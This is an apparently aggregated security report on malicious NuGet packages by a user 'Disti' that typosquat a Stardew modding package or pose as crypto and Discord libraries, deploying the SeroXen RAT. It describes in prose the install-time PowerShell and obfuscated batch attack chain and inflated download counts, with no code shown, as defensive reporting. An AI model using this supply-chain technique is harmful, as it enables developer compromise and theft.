A user named Disti has published malicious NuGet packages on the package manager for the .NET Framework. These packages include a typosquat of a legitimate package and several others that masquerade as crypto service libraries but actually deploy a remote access trojan (RAT). The discovery of these malicious packages highlights the exploitation of open-source ecosystems by attackers [6].

Description

A user named Disti has uploaded malicious NuGet packages on the package manager for the .NET Framework. One of these packages [3], called Pathoschild.Stardew.Mod.Build.Config [1] [2] [5] [6], is a typosquat of a legitimate package called Pathoschild.Stardew.ModBuildConfig [1] [2] [5] [6]. The malicious variant has artificially inflated its download count to surpass 100,000 downloads [2] [5] [6]. Disti has also uploaded six other packages that pretend to be crypto service libraries but actually deploy the SeroXen remote access trojan (RAT).

The attack chain begins with the installation of the package through a PowerShell script [2] [5] [6]. This script downloads a heavily-obfuscated Windows Batch script [2] [5], which is responsible for constructing and executing another PowerShell script to deploy the SeroXen RAT [5]. The SeroXen RAT is a fileless RAT that combines the functions of Quasar RAT [2] [5] [6], the r77 rootkit [2] [5] [6], and NirCmd [2] [5] [6].

Furthermore, additional malicious NuGet packages have been discovered that impersonate crypto wallets [3], crypto exchanges [3] [4], and Discord libraries [3] [4]. These packages were also uploaded by the user named Disti and contain an XML file that downloads an obfuscated Windows batch file to carry out malicious activities [3]. It is important to note that the download numbers for these packages may be inflated and do not necessarily reflect their reach in the NuGet community.

These malicious NuGet packages have gained significant attention, with over 2 million downloads [4], as they are being used to distribute the SeroXen RAT. They specifically target developers by impersonating popular crypto wallets, crypto exchanges [3] [4], and Discord libraries [3] [4]. The installation process involves the execution of PowerShell scripts that download and execute CMD and Batch files from external URLs [4]. One of the downloaded files [4], named ‘x.bin,’ is an obfuscated batch script with over 12,000 lines [4]. Its purpose is to construct and execute another PowerShell script [4]. The final script decrypts and decompresses an encoded payload [4], which is identified as the SeroXen RAT [4]. This RAT is marketed as a legitimate program and is sold for a monthly fee or a one-time purchase [4]. It is gaining popularity among cybercriminals due to its low detection rates and powerful capabilities [4].

Conclusion

The discovery of these malicious NuGet packages highlights the vulnerability of open-source ecosystems to exploitation by attackers. It is crucial for developers to be cautious when downloading and installing packages, especially those impersonating popular crypto wallets, crypto exchanges [3] [4], and Discord libraries [3] [4]. Mitigations should include verifying the legitimacy of packages and their download counts, as well as regularly updating security measures. The use of fileless RATs like SeroXen RAT poses a significant threat due to their low detection rates and powerful capabilities. As cybercriminals continue to exploit open-source ecosystems, it is important for the community to remain vigilant and proactive in protecting against such attacks.

References

[1] https://blog.phylum.io/phylum-discovers-seroxen-rat-in-typosquatted-nuget-package/
[2] https://api-security.blog/2023/10/12/malicious-nuget-package-targeting-net-developers-with-seroxen-rat/
[3] https://cyber.vumetric.com/security-news/2023/10/12/malicious-solana-kucoin-packages-infect-nuget-devs-with-seroxen-rat/
[4] https://summamoney.com/investing/the-daily/malicious-solana-kucoin-packages-infect-nuget-devs-with-seroxen-rat/
[5] https://patabook.com/technology/2023/10/12/malicious-nuget-package-targeting-net-developers-with-seroxen-rat/
[6] https://thehackernews.com/2023/10/malicious-nuget-package-targeting-net.html